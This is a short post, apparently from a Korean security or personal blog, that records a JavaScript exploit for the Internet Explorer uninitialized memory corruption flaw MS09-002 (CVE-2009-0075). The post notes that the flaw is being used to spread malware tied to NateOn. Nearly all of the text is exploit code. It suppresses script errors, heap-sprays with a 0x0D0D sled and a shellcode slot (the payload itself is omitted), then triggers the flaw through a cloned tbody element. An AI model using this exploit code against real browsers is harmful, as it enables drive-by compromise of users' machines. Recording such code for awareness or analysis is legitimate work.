Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002, CVE-2009-0075)

[code]<SCRIPT LANGUAGE="JavaScript">
<!– Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
// –>
</SCRIPT>
<script language="JavaScript">
var aaa4=’생략’;
var aa4=(aaa4.replace(/MV/g,"%u"));
var shellcode=unescape(aa4);

var array = new Array();

var calc = 0x100000-(shellcode.length*2+0x01020);

var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;

for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
[/code]

네이트온 관련 악성코드 유포 취약점으로 이용되고 있어 기록해 둡니다.

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다